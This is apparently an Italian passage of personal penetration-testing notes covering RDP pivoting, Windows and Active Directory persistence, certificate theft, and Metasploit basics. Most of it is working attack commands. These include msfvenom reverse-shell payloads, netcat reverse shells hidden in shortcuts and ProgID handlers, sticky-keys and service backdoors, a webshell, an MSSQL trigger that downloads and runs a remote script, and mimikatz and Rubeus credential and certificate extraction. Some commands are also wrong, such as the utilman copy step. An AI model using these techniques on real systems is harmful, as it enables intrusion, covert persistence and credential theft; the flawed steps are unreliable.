proxychains nmap -sV -sT <ip host target> -p<porta target> #comando che utilizza nmap su un host target tramite proxychains

6. SocksOverRDP e Proxifier:

SocksoverRDP è un tool che utilizza i DVC(Dynamic Virtual Channels) del RDP per il tunneling delle connessioni del remote desktop protocol

Comandi:

Allora come primi passi dobbiamo scaricare "SocksOverRDPx64.zip" e "Proxifier", i file .zip vanno passati alla pivot machine (python server) e vanno decompressi, andrà poi importata una DLL e fatta la connessione RDP con la macchina target

python3 -m http.server 80 #comando per avviare il webserver

curl -o <nome>.zip http://<ip macchina kali>/<zip di sockoverRDP>.zip #comando per passare dalla nostra macchina alla pivot machine SockOverRDP

Estraiamo la cartella e i due file .exe e .dll li trasferiamo nel desktop, avviamo una powershell come amministratori e inviamo i seguenti comandi

regsvr32.exe SocksOverRDP-Plugin.dll #comando per importare la .dll

mstsc.exe #comando che avvia un eseguibile per la connessione a Remote Desktop Protocol verso la macchina target

Adesso andrà fatto un ulteriore spostamento del "SocksOverRDPx64.zip" verso la target machine, per farlo possiamo creare sulla pivot machine una cartella condivisibile tramite SMB e con all'interno i 2 file del .zip

creare una nuova cartella-> inserire i due .file .dll e .exe-> click destro proprietà-> condivisione-> condivisione avanzata-> condvidi cartella #passi per creare la cartella condivisibile

\\<ip pivot host>\<nome cartella> #comando che se inserito su esplora risorse, inserite le credenziali possiamo accedere alla cartella condivisibile e scaricare i due file

Trasferiamo i 2 file nel desktop apriamo una shell privilegiata e eseguiamo questi 2 comandi:

regsvr32.exe SocksOverRDP-Plugin.dll #comando per importare la .dll

.\SocksOverRDP-Server.exe #comando per avviare il server che farà da tunneling

Ritornando sulla pivot machine, aprendo un cmd shell e lanciano il seguente comando:

netstat -antb | findstr 1080 #comando che lista le connessioni e poi ricerca la stringa di valore 1080
TCP    127.0.0.1:1080         0.0.0.0:0              LISTENING #output comando

Possiamo notare un socket di rete aperto sul localhost alla porta 1080, in ascolto su ogni interfaccia di rete e ogni porta, questo sta a significare che il SOCKS listener è stato avviato; ora non resta che avviare proxifier con i seguenti passi:

profile-> proxy servers-> add-> ip 127.0.0.1 porta 1080 protocollo SOCKS5-> ok #passi per preparare il tool proxifier

Ora tutto è pronto, il proxy server è impostato, ogni comando inviato passerà da lui per poi continuare la sua strada verso la pivot machine tramite RDP

7. Sito per mappe mentali:

Il pivoting tra diverse macchine può diventare tedioso perchè può capitare che un host vadi offline, che una subnet venga cambiata e mille altri problemi è quindi importante tenere con se una piccola mappa mentale della rete target tramite il sito diagrams

La persistence è la pratica di mantenere un accesso alla macchina compromessa, perchè non è sempre possibile rientrare con le stesse metodologie adottate nella foothold iniziale

N.B: E' richiesto di avere un account con privilegi

La prima tecnica di persistenza è quella di aggiungere un utente meno privilegiato ad un gruppo che invece abbia più permessi come l'administrators group, il backup operators group o il remote management users. Per ogni gruppo ci sono vantaggi e svantaggi, l'administrators da molti privilegi ma può dare nell'occhio, il backup operators ha meno privilegi ma può dumpare SAM e SYSTEM e vedere le chiavi di registro e il remote management users permette il controllo da remoto (RDP)

Comandi:

net localgroup <nome gruppo> <nome utente> /add #comando CMD per aggiungere un utente al gruppo 

La connessione da remoto però innesca l'attivazione del "LocalAccountTokenFilterPolicy" policy dell' UAC che toglie i poteri d'amministratori derivati dai gruppi se connessi da remoto

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /t REG_DWORD /v LocalAccountTokenFilterPolicy /d 1 #comando per disattivare la policy

• Gruppi annidati:

La tecnica consiste nel creare diversi gruppi fasulli uno membro dell'altro per poi aggiungere un gruppo come quello degli amministratori a questo "nido" ed infine aggiungere il nostro utente che avrà i privilegi del gruppo di amministratori

Comandi:

New-ADGroup -Path "OU=<nome ou>,OU=<nome ou>,DC=<nome DC>,DC=<altro nome DC>,DC=<altro nome DC>" -Name "<nome gruppo>" -SamAccountName "<nome SAM>" -DisplayName "<nome che vogliamo mostrare" -GroupScope Global -GroupCategory Security #comando per creare un gruppo

Quindi creiamo quanti gruppi vogliamo per poi aggiungere uno ad uno con questo comando

Add-ADGroupMember -Identity "<nome SAM gruppo d'aggiungere>" -Members "<nome SAM gruppo annidato>" #comando per aggiungere un gruppo ad un altro gruppo

Aggiungiamo l'user al gruppo iniziale

Add-ADGroupMember -Identity "<nome SAM gruppo iniziale>" -Members "<nome SAM user>" #comando per aggiungere l'user ad un gruppo

Get-ADGroupMember -Identity "<nome gruppo admin>" #comando per controllare se l'user è nel gruppo di admin

• AdminSDHolder:

AdminSDHolder è un template container presente in ogni dominio che ogni 60 minuti tramite il processo "SDProp" applica la sua ACL a tutti i gruppi considerati protetti di cui ne fanno anche parte Domain admins, Administrators, Enterprise Admins, ecc...

Comandi:

runas /netonly /user:<dominio>\<utente> cmd.exe #comando per aprire una nuova shell con l'utente selezionato

mmc #comando per aprire microsoft management console

File-> aggiungi/rimuovi snap-in-> Active directory Utenti e Computer-> AdminSDHolder-> click destro-> Proprietà-> sicurezza-> aggiungi-> aggiungiamo il nostro utente-> controlli nomi-> permessi completi-> attendere 60 minuti e il nostro utente avrà il controllo completo sui gruppi protetti #passi per aggiungere l'user scelto da noi alla cartella AdminSDHolder con permessi completi

Esiste altrimenti lo script che può semplificarci la vita

• GPO (Group Policy Management):

Il GPO si occupa del controllo delle policy di configurazione locale delle varie macchine all'interno dell'AD, per esempio ha il compito di: tenere le configurazione dell'AV, decidere quali script devono runnare al boot del computer e ecc...

Due tecniche sono comuni per la persistence con la GPO:

1. Restricted Group Membership: permette l'accesso ad ogni host nell'AD

2. Logon Script Deployment: decisione su quale script runna ogni volta che il pc viene avviato, esempio una revshell

Comandi:

N.B: I .bat sono più stabili con la GPO

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=<ip> lport=<porta> -f exe -o <nome eseguibile>.exe #comando per creare un'eseguibile con all'interno una revshell

msfconsole -q -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST <ip>; set LPORT <porta>;exploit" #comando per startare il listener sulla nostra machine

mmc #comando per aprire il microsoft management console

File-> aggiungimi/rimuovi snap-in-> GPO-> aggiungi-> cliccare su qualsiasi OU si voglia-> creare una GPO con qualsiasi nome-> click destro-> applica poi-> Group Policy Management Editor-> policies-> impostazioni finestre-> scripts-> Logon-> proprietà-> selezionare il nostro script con la revshell->applica e ok #passi completi per aggiungere la propria GPO policy che funziona ad ogni boot del pc

andare sulla nostra OU selezionata-> delega-> click destro sul gruppo ottenuto con la revshell-> modifica impostazioni-> elimina,modifica sicurezza-> click sugli altri gruppi e li rimuoviamo-> sicurezza-> avanzate-> rimuovi il proprietario dai permessi-> sempre in sicurezza aggiungi clicchiamo-> aggiungiamo Domain computers-> gli diamo i permessi di lettura-> clicchiamo ok e rimuoviamo l'ultimo gruppo rimasto #passi completi per non fare leggere la nostra GPO

I privilegi possono essere fonte di persistenza, in quanto vi sono alcuni di loro che danno più poteri del necessario

• SeBackupPrivilege/SeRestorePrivilege:

Sono due priviliegi che danno molto potere, "SeBackupPrivilege" permette di leggere ogni file nel sistema invece "SeRestorePrivilege" permette di scrivere ogni file del sistema, avendo tali poteri è possibile modificare qualsiasi cosa

1. Modifica policy di sicurezza:

Comandi:

secedit /export /cfg <nome file>.inf #comando per esportare le policy di sicurezza locale

Avendola esportata potremmo aggiungere degli account nei diversi privilegi che vediamo scritti e poi ricaricarla nel sistema

secedit /import /cfg <nome file>.inf /db config.sdb #comando che importa la nuova configurazione modificata nel database di sicurezza

secedit /configure /db config.sdb /cfg <nome file>.inf #comando che applica la configurazione importata nel database di sicurezza

La modifica di servizi già esistenti o la creazione di nuovi può essere utilizzato a nostro favore

• Backdoor nei servizi:

La modifica della path del binario a cui punta un servizio può essere utilizzata per la creazione di una backdoor

Comandi:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ip> LPORT=<porta> -f exe-service -o <nome eseguibile>.exe #commando che crea un eseguibile con al suo interno una revshell

sc.exe create <nome servizio> binPath= "<path dell'eseguibile>" start= auto #comando per creare un servizio che punti all'eseguibile

sc.exe start <nome servizio> #comando per avviare il servizio

• Modificare servizi esistenti:

La possibilità di modificare i servizi già presenti può essere utilizzato a nostro vantaggio e da meno nell'occhio

Comandi:

sc.exe query state=all #comando per listare tutti i servizi

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ip> LPORT=<porta> -f exe-service -o <nome eseguibile>.exe #commando che crea un eseguibile con al suo interno una revshell

sc.exe config <nome servizio da modificare> binPath= "<path dell'eseguibile>" start= auto obj= "<account che utilizza il servizio>" #comando per modificare un servizio

• Eseguibili:

Un file eseguibile apre le porte a moltissime opzioni di persistenza come una piccola backdoor

Comandi:

msfvenom -a x64 --platform windows -x <nome eseguibile utilizzato>.exe -k -p windows/x64/shell_reverse_tcp lhost=<ip> lport=<porta> -b "\x00" -f exe -o <nome nuovo eseguibile>.exe #comando per generare un eseguibile con al suo interno una revshell

• Shortcut file:

Anche le shortcut possono essere fonti di backdoor andandole a modificare

Comandi:

Script.ps1: #nome dello script con di seguito il codice da scriverci
Start-Process -NoNewWindow "c:\tools\nc64.exe" "-e cmd.exe <ip> <porta>" #comando che runna un processo che si collega ad un dato ip e porta
C:\Windows\System32\<nome eseguibile>.exe #avvio dell'eseguibile che verrà modificato

powershell.exe -WindowStyle hidden C:\Windows\Tools\script.ps1 #comando da sostituire alla destinazione del collegamento

shortcut-> proprietà-> destinazione -> script creato da noi #path per modificare il collegamento

• Hijacking ProgID:

Un file possiede una determinata estensione, bene è possibile andare a modificare il ProgID di quela file (Viene spiegato qui cos'è il ProgID, nell'exploit con fodhelper)

Comandi:

HKEY_LOCAL_MACHINE\SOFTWARE\classes\.<estensione> #path per vedere il nome del ProgID

ES: HKEY_LOCAL_MACHINE\SOFTWARE\classes\.txt = txfile/txtlegacy

HKEY_LOCAL_MACHINE\SOFTWARE\classes\<nome ProgID>\shell\open\command #path dove troviamo l'eseguibile che viene ricercato ogni volta che apriamo una determinata estensione

Script.ps1: #nome dello script con di seguito il codice da scriverci
Start-Process -NoNewWindow "c:\tools\nc64.exe" "-e cmd.exe <ip> <porta>" #comando che runna un processo che si collega ad una dato ip e porta
C:\Windows\system32\<nome eseguibile>.exe #comando che runna l'eseguibile

powershell.exe -WindowStyle hidden C:\Windows\Tools\script.ps1 #valore da cambiare al default value della chiave di registro

La spiegazione di cosa sono e di quali sono i registri si trova qui

I registri sono una componente fondamentale in windows che se modificati a nostro vantaggio possono tornare molto utili

• Registri di avvio:

Il target sono questi sottoregistri di avvio:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run
HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce

N.B: HKCU si applica solo all'utente corrente, HKLM si applica a tutti; la key "Run" avvia gli eseguibili al suo interno ogni volta che vi è il login mentre "RunOnce" solo una volta.

Comandi:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ip> LPORT=<porta> -f exe -o <nome eseguibile>.exe #comando per creare un'eseguibile con revshell

Editor registri-> HKLM\Software\Microsoft\Windows\CurrentVersion\Run-> creiamo un value di tipo REG_EXPAND_SZ che punta al path del nostro eseguibile #passi per creare un value che punti al nostro eseguibile

• COM hijacking:

Il COM hijacking è la tecnica di creare COM finti che all'avvio del PC ci consentano di ottenere una revshell

Chiavi di registro dove trovare i CLSID:

HKCU\Software\Classes\CLSID\

HKCR\CLSID\<CLSID>

HKLM\Software\Classes\CLSID\

N.B: Importante ricordarsi che le HKCU caricano i CLSID dei COM prima dei HKLM

Comandi:

Primo passo bisognerà cercare un CLSID non esistente, per poi aggiungere un'altra subkey chiamata "Inprocserver32" che punti ad una DLL malevola

reg add 'HKCU\Software\Classes\<CLSID>\InprocServer32' /f #comando per aggiungere le 2 subkey directory 

reg add 'HKCU\Software\Classes\<CLSID>\InprocServer32' /v <nome chiave> /t REG_SZ /d <path dll malevola> /f #comando per aggiungere la subkey che punta all'.exe malevolo

N.B: E' richiesto di avere un account con privilegi

• Secure Descriptor (WinRM):

Teoria del secure descriptor qui

Possiamo permettere ad un nostro utente creato per la persistence di poter loggare da remoto tramite la modifica del secure desciptor

Comandi:

Set-PSSessionConfiguration -Name Microsoft.PowerShell -showSecurityDescriptorUI #comando per aprire graficamente il WinRM secure descriptor

selezionare l'utente -> controllo completo #passi per applicare la modifiche

• RID Hijacking:

Il RID è un identificativo numerico per i vari utenti ed è utilizzato dal LSASS infatti quando vi è un'accesso LSASS collega il RID di un utente ad un token di accesso dell'UAC, andando a fare l'Hijacking del RID un semplice utente può risultare come un admin

Comandi:

Get-LocalUser | fl * #comando per ottenere info sugli utenti, specialmente per capire il RID dell'admin

PsExec64.exe -i -s regedit #comando per avviare regedit con privilegi di amministratore

HKLM\SAM\SAM\Domains\Account\Users\ #path per modificare i RID

Nella folder Users, potremmo notare diverse altre subfolder con numeri esadecimale, se convertiti in decimale possiamo ricavare il RID ottenuto con il comando in powershell; ora non ci rimane che selezionare la subfolder del nostro utente, andare al valore "F" che conterrà il RID (registrato in little-endian) e modificarlo con quello dell'admin

ES:

Admin = RID(500)-> Esadecimale(0x1F4)-> Subkey(000001F4)

UserMalevolo = RID(502)-> Esadecimale(0x1F6)-> Subkey(000001F6)-> Value F che verrà cambiato da (F6 10) in (F4 10)

UserMalevolo una volta rieffettuato il login avrà i privilegi di admin

• SID History:

Una history dei SID che ha avuto un utente con i relativi permessi di cui godeva

Comandi:

Get-ADUser <nome utente> -properties sidhistory #comando che recupera la SID history

Get-ADGroup "<nome gruppo>" #comando per recuperare il SID del gruppo che in seguito verrà utilizzato

Stop-Service -Name ntds -force #comando per fermare il servizio ntds, in quanto bisogna apportare delle modifiche al DB dell'AD

Ora entra in gioco un tool che ci permette di modificare la SID history

Add-ADDBSidHistory -SamAccountName '<nome SAM>' -SidHistory '<SID che vogliamo aggiungere>' -DatabasePath C:\Windows\NTDS\ntds.dit #comando per aggiungere il SID al NTDS.dit

Start-Service -Name ntds #comando per riavviare il servizio ntds

• Task Scheduler:

Il Task scheduler oltre ad essere fonte di Privilege escalation è utilizzato nella persistence tramite la creazione di un nuovo task o della modifica di uno già esistente

Comandi:

schtasks /create /sc minute /mo 10 /tn <nome task> /tr "<path programma o comando da eseguire" /ru <utente che lo esegue> #creazione di un task che si esegue ogni 10 minuti

schtasks /query /tn <nome task> #comando per vedere lo stato del nostro task

Vi è la possibilità di rendere invisibile un task, andando ad eliminare il suo secure descriptor(SD) nelle chiavi di registro.

regedit #comando per aprire regedit

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\<nome task da modificare> #path dove si trova SD del task da eliminare

SD #nome del valore da eliminare

Andando a fare una query del nostro task potremmo vedere che vi sarà un errore del sistema siccome non lo troverà.

• Cartella Startup:

Ogni utente in un sistema windows dispone di una propria cartella che quando viene effettuato il login avvia degli eseguibili, quindi con i permessi necessari potremmo inserire un nostro payload

Comandi:

C:\Users\<nome utente>\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup #path della cartella startup

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ip> LPORT=<porta> -f exe -o <nome eseguibile>.exe #comando per creare un'eseguibile con revshell

Ora va passato sulla target machine e inserito nella path della cartella startup.

• WinLogon:

Spiegazione di WinLgon qui

WinLogon sfrutta delle chiavi di registro alla path "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon", e due sono i value interessanti "UserInit" che ha il compito di caricare le preferenze dell'utente e "Shell" che nella maggior parte dei casi punta a explorer.exe; aggiungendo una semplice virgola a "Shell" possiamo fare in modo di avviare un nostro eseguibile

Comandi:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<ip> LPORT=<porta> -f exe -o <nome eseguibile>.exe #comando per creare un'eseguibile con revshell

regedit -> HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\UserInit-> explore.exe, <path del nostro eseguibile> #passi per modificare la chiave Shell

Altro metodo di persistenza quando si esegue il logon è andare alla seguente path "HKCU\Environment" e creare una nostra variabile d'ambiente di nome "UserInitMprLogonScript" che punti al nostro eseguibile e ogni volta che avviene un logon si avvierà.

• Screensaver:

Lo Screensaver di windows utilizzato per evitare il burn-in degli schermi può essere utilizzato come tecnica di persistence

Comandi:

reg query "HKCU\Control Panel\Desktop" #comando per vedere se attivo infatti se la voce "ScreenSaveActive" è settato a 1 significa che è attivo

reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "<nome chiave di registro>" /t REG_SZ /d "<path all'eseguibile per la revshell>" /f #comando per aggiungere un binario che causa persistenza

reg delete "HKEY_CURRENT_USER\Control Panel\Desktop" /v "<nome chiave di registro>" /f #comando per rimuovere la chiave di registro creata

Possiamo anticipare l'attivazione andando a modificare lo "ScreenSaveTimeOut", andando ad accorciare il tempo

reg query "HKEY_CURRENT_USER\Control Panel\Desktop\ScreenSaveTimeOut" #comando per capire quanto tempo è impostato prima che si attivi lo screensaver

reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "ScreenSaveTimeOut" /t REG_SZ /d "<tempo in secondi>" /f #comando per modificare il tempo di attivazione

reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v "ScreenSaveTimeOut" /t REG_SZ /d "<reimpostare il tempo di default>" /f #comando per reimpostare il valore di default

• Tasti Permanenti:

Quando viene premuto rapidamente per 5 volte di seguito il tasto SHIFT, windows aprirà un'eseguibile di nome "setch.exe", sostituendolo avremmo la possibilità di eseguire un nostro eseguibile anche prima della schermata di login.

Comandi:

takeown /f C:\Windows\System32\sethc.exe #comando per prendere il controllo dell'eseguibile

icacls C:\Windows\System32\sethc.exe /grant Administrator:F #comando per darsi i permessi sull'eseguibile

copy c:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe #sostituzione dell'eseguibile con un CMD di user SYSTEM

• Utilman:

Utilman è un'eseguibile che fornisce delle opzioni di accesso semplificato prima del login, anche in questo caso avendo i giusti permessi, possiamo sostituire l'eseguibile "utilman.exe" con un "cmd.exe"

Comandi:

takeown /f C:\Windows\System32\utilman.exe #comando per prendere il controllo dell'eseguibile

icacls C:\Windows\System32\utilman.exe /grant Administrator:F #comando per darsi i permessi sull'eseguibile

copy c:\Windows\System32\utilman.exe C:\Windows\System32\sethc.exe #sostituzione dell'eseguibile con un CMD di user SYSTEM

• IIS:

Inserendo una webshell all'interno della root del server IIS potremmo loggare come utente del servizio con i relativi privilegi annessi, tra cui uno molto importante SeImpersonatePrivilege

Comandi:

move <nome webshell>.aspx C:\inetpub\wwwroot\ #comando per copiare la webshell nella root dell'IIS

icacls <nome webshell>.aspx /grant Everyone:F #comando per darsi il controllo totale sulla webshell

http://<ip target/<nome webshell>.aspx #Url da visitare e attivare la webshell

• Mysql:

Mysql è presente in molti sistemi e può essere utilizzato per i nostri scopi

Comandi:

Microsoft SQL Server Management Studio-> accesso con le credenziali dell'user-> nuova query #passi per fare una query

Query:

sp_configure 'Show Advanced Options',1;
RECONFIGURE;
GO #query che attiva le opzioni avanzate

sp_configure 'xp_cmdshell',1;
RECONFIGURE;
GO #query che avvia la xp_cmdshell

USE master

GRANT IMPERSONATE ON LOGIN::<nome account admin> to [Public]; #comando che da i privilegi a tutti gli utenti, impersonandosi come admin del DB

USE HRDB #utilizzo del DB HRDB

CREATE TRIGGER [backdoor]
ON HRDB.dbo.Employees 
FOR INSERT AS
      
EXECUTE AS LOGIN = 'sa'
EXEC master..xp_cmdshell 'Powershell -c "IEX(New-Object net.webclient).downloadstring(''http://<ip>:<porta>/<script>.ps1'')"';
#query che crea un trigger che si connette ad uno nostro webserver e scarica il nostro script.ps1

• PWA (Powershell Web Access):

Installare un'instanza web sull'AD target può permettere una tecnica di persistence da remoto

Comandi:

Install-WindowsFeature -Name WindowsPowerShellWebAccess #comando che installa PWA

Install-PswaWebApplication -useTestCertificate #comando che avvia PWA con un certificato di test

Add-PswaAuthorizationRule -Username <nome utente> -Computername <nome computer> -ConfigurationName * #comando che specifica chi è autorizzato ad accedere

Dopo aver settato tutto bisogna navigare all'URL "https:///pswa" con "/"

• Certificati:

la spiegazioni sui certificati la si trova qui

Comandi:

certutil -v -template #comando per listare i template

caratteristiche dei template che interessano a noi:

1. template con i permessi di poter richiedere un certificato quali Allow Enroll o Allow Full Control

#Lo si trova greppando per ogni parola di Allow Enroll o Allow Full Control per poi vedere se il gruppo che ha questi privilegi è il gruppo in cui poi apparteniamo anche noi

2. template che permetta l'autenticazione del client che verrà in seguito utilizzata per l'autenticazione al kerberos

#per trovarlo bisogna andare a vedere le proprietà della voce EKU e trovare la parola Client Authentication

3. template che permette di alterare il SAN (subject alternative name)

#Lo si trova greppando per CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT, se settato a 1 possiamo modificare il SAN

Un template avendo le 3 caratteristiche elencate sopra potrà essere utilizzato a nostro vantaggio

Viene inserito sia il metodo con GUI e CLI:

• Metodo GUI:

mmc #comando per aprire microfsoft management console

File-> aggiungi/rimuovi snap-in-> Certificati-> selezioniamo il mio account utente #passi per creare un certificato generale

N.B: Senza privileggi possiamo selezionare solo account utente e non account servizi o account computer quando creiamo il certificato generale

Console Root-> Certificati-> Personale-> tutte le attività-> richiedi nuovo certificato-> avanti-> scritta blu maggiori informazioni sono richieste #passi per creare il certificato personalizzato

#ora va inserito l'UPN dell'user che vogliamo impersonare nel campo SAN

Get-ADUser | fl * #comando per trovare gli user con UPN annesso se presente

#invece nel campo nome soggetto va cambiato con nome comune

Ok-> Enroll-> ora il certificato sarà pronto e deve essere esportato-> click destro sul certificato-> tutte le attività-> esporta-> selezionare si per esportare la chiave privata-> configurare una password-> avanti e verrà esportato #passi per salvare ed esportare il certificato con la relativa chiave privata

N.B: Esportare il certificato con chiave privata annessa è possibile anche con Mimikatz

Ora non dobbiamo fare altro che prenderci il kerberos ticket

link per scaricare rubeus

Rubeus.exe asktgt /user:<nome utente che deve coincidere con quello dell'UPN> /enctype:aes256 /certificate:<path del certificato> /password:<password certificato> /outfile:<file dove verrà salvato il TGT> /domain:<dominio> /dc:<ip> #comando per richiedere il TGT tramite il nostro certificato

Rubeus.exe changepw /ticket:<path al file TGT> /new:<nuova password> /dc:<dominio> /targetuser:<dominio>\<user> #comando per cambiare password dell'account che vogliamo attaccare

Comandi per creare il certificato da CMD con il tool ForgeCert

ForgeCert.exe --CaCertPath <certificato esportato>.pfx --CaCertPassword <password> --Subject CN=<nome> --SubjectAltName <UPN> --NewCertPath <path o nome dove salvare il file>.pfx --NewCertPassword <nuova password> #comando per creare il nostro certificato

• Metodo CLI:

Verifichiamo per eventuali vulnerabilità nei certificati

.\Certify.exe find /vulnerable #comando per cercare vulnerabilità

.\Certify.exe request /ca:<dominio CA> /template:UserCert /altname:<nome utente> #comando per ottenere certificato con chiave privata

Copiare chiave privata e certificato in file chiamato "cert.pem"

sed -i 's/\s\s+/\n/g' cert.pem #comando per formattare il cert.pem

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx aggiungere una password per esportare #comandi per creare il certificato in formato PFX

Ora va importato nella target machine e tramite rubeus richiediamo il TGT

Rubeus.exe asktgt /user:<nome utente che deve coincidere con quello dell'UPN> /enctype:aes256 /certificate:<path del certificato> /password:<password certificato> /outfile:<file dove verrà salvato il TGT> /domain:<dominio> /dc:<ip> #comando per richiedere il TGT tramite il nostro certificato

• THEFT:

I THEFT sono metodologie di ""furto"" dei certificati per poi utilizzarli nella persistence

1. Windows Store e Crypto api (THEFT1):

Nel primo passo può succedere che i certificati siano disponibili localmente nel microsoft store

Comandi:

certutil -user -store My 
Get-ChildItem Cert:\CurrentUser\My -Recurse
Get-ChildItem Cert:\CurrentUser\ -Recurse #comandi per listare i certificati nello store utente

certutil -store My 
Get-ChildItem Cert:\LocalMachine\My -Recurse
Get-ChildItem Cert:\LocalMachine\ -Recurse #comando per listare i certificati nello store macchina

$pwd = ConvertTo-SecureString -String "<password>" -Force -AsPlainText #comando per creare una variabile contenente la password
Export-PfxCertificate -Cert cert:\<nome user corrente>\my\<numero di serie> -FilePath ./<nome file ouput>.pfx -Password $pwd #comando per esportare il certificato

certutil -p <password> -exportpfx <numero di serie> <nome file output>.pfx #comando per esportare i certificati con certutil

Come scritto di sopra "può succedere" infatti che windows per aggiungere un layer di sicurezza ai certificati ha introdotto le crypto API, la prima è "CAPI" (Prima ad essere introdootta e presente in ogni versione di windows) la seconda è "CNG" (Cryptography Next Generation come si evinnce dal nome più recente e più sicura) però tramite il tool mimikatz è possibile patcharli

privilege::debug #comando per controllare se abbiamo i privilegi necessari

crypto::capi #comando per patchare CAPI

crypto::cng #comando per patchare CNG

crypto::certificates /export #comando per esportare i certificati

N.B: L'api CNG richiede che venga patchato lsass.exe

2. Certificato utente via DPAPI (THEFT2):

Windows stora le chiavi private dei certificati utente tramite il DPAPI, quindi il nostro compito sarà di recuperare il certificato target, la DPAPI masterkey per decriptare la chiave privata associata al certificato

Locazione certificati utente:

HKCU\SOFTWARE\Microsoft\SystemCertificates #locazione dei certificati utenti nei registri

%APPDATA%\Microsoft\SystemCertificates\My\certificate #locazione #locazione dei certificati utenti su disco

Loazione chiavi private:

%APPDATA%\Microsoft\Crypto\RSA\<sid utente>\<num identificativo> #locazione chiavi CAPI 

%APPDATA%\Microsoft\Crypto\Keys\<num identificativo> #locazione chiavi CNG 

Comandi:

./mimikatz.exe "crypto::system /file:<num identificativo> /export" #comando per esportare certificato e chiave pubblica

dpapi::masterkey /in:"<path masterkey>" /sid:<sid utente> /password:<password> #comando per recuperare la master key ma dobbiamo conoscere la password del utente

dpapi::masterkey /in:<path masterkey> /rpc #comando per recuperare la masterkey

dpapi::capi /in:\"Crypto\RSA\<sid utente>\<num identificativo>\" /masterkey:<masterkey> #comando per decriptare la chiave privata

Possiamo utilizzare anche il tool SharpDPAPI, se non disponibile mimikatz

SharpDPAPI.exe certificates #comando per cercare i certificati

SharpDPAPI.exe certificates /password:<password> #comando per dumpare i certificati con la password

Se si ha necessità di convertire da .pem a .pfx (inserire in cert.pem chiave privata e certificato)

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx #comando per convertire da .pem a .pfx

3. Certificato macchina via DPAPI (THEFT3):

I certificati di tipo macchina hanno anche loro path dove cercarli

Locazione certificati macchina:

HKLM\SOFTWARE\Microsoft\SystemCertificates #locazione dei certificati macchina nei registri

Locazione chiavi private:

%ALLUSERSPROFILE%\Application Data\Microsoft\Crypto\RSA\MachineKeys\<sid utente>\<num identificativo> #locazione chiavi CAPI

%ALLUSERSPROFILE%\Application Data\Microsoft\Crypto\Keys\<num identificativo> #locazione chiavi CNG

Comandi:

SharpDPAPI.exe certificates /machine #comando per recuperare i certificati macchina

crypto::certificates /export /systemstore:LOCAL_MACHINE #comando di mimikatz per esportare i certificati macchina

lsadump::secrets #comando per recuperare la master key

4. File dei certificati (THEFT4):

I certificati possono essere anche tranquillamente a giro nel fileystem, salvati nelle diverse estensioni come: .pkcs12, .pem, .pfx, .p12, e ecc...

Comandi:

dir C:\*.pfx C:\*.pem C:\*.p12 C:\*.crt C:\*.cer C:\*.p7b C:\*.ovpn /s /b #comando CMD per cercare le varie estensioni

Get-ChildItem C:\ -include ('*.pem', '*.pfx', '*.p12', '*.crt', '*.cer', '*.key', '*.ovpn') -recurse -erroraction 'silentlycontinue' #comando powershell per cercare le varie estensioni

$CertPath = "<path al file>.pfx"
$CertPass = "<password>"
$Cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2 @($CertPath, $CertPass)
$Cert.EnhancedKeyUsageList #comandi per controllare l'utilizzo del certificato

5. NTLM furto (THEFT5):

Un utente autotenticato con TGT via PKINI ci da la possibilità di ottnere NTLM hash tramite una struttura "PAC_CREDENTIAL_DATA"

Comandi:

Rubeus.exe asktgt /getcredentials /user:"<nome uetnte>" /certificate:"<base64 del certificato>" /password:"<password certificato" /domain:"<full qualified domain name>" /dc:"<domain>" /show #comando che tramite rubeus recupera NTLM hash

certipy-ad auth -pfx '<nome file>.pfx' -no-save #comando per runnare da linux e recuperare NTLM hash

• Tool audit:

Tool utile per l'audit dei certificati scaricabile qua

La sezione tools contiene spiegazioni e comandi

Metasploit è un framework molto utilizzato nel mondo del pentesting, in quanto al suo interno si possono trovare numerosi exploit, vulnerabilità e payload; metasploit dispone dei moduli, che possono essere di diverse tipologie:

Moduli:

I moduli li troviamo alla seguente path "/usr/share/metasploit-framework/modules", sono il cuore principale dello stesso framework e sono divisi in:

Nel modulo payload poi abbiamo delle sottocategorie:

• Adapters = adatta un payload in differenti formati tipo in un bash command

• Stageless = Payload che runna nel computer vittima da sola, cioè senza componenti ulteriori da scaricare ("_" è indicato con l'underscore "msfvenom -p windows/x64/meterpreter_reverse_tcp")

• Staged = Payload che prima viene runnato nel computer vittima e che poi deve scaricare il resto del payload detto "Stage" ("/" è indicato "msfvenom -p windows/x64/meterpreter/reverse_tcp")

Sintassi dei moduli:

<Numero> <tipo>/<OS>/<servizio>/<nome> #sintassi dei moduli in metasploit

ExploitDB e Metasploit:

Meterpreter non può contenere tutti gli exploit ma possiamo integrarli con payload custom o exploitDB:

Comandi:

searchsploit -u #comando che aggiorna searchsploit

searchsploit -t <nome exploit> --exclude="<nome estensione>" #comando che sfrutta la cli di exploitDB per ricercare i payload tramite titolo e esclusione dell'estensione

Una volta trovato l'exploit andrà importato come nell'esempio:

searchsploit PHP 5.4.3 - apache

Output comando:

PHP 5.4.3 - apache_request_headers Function Buffer Overflow (Metasploit) windows/remote/19231.rb

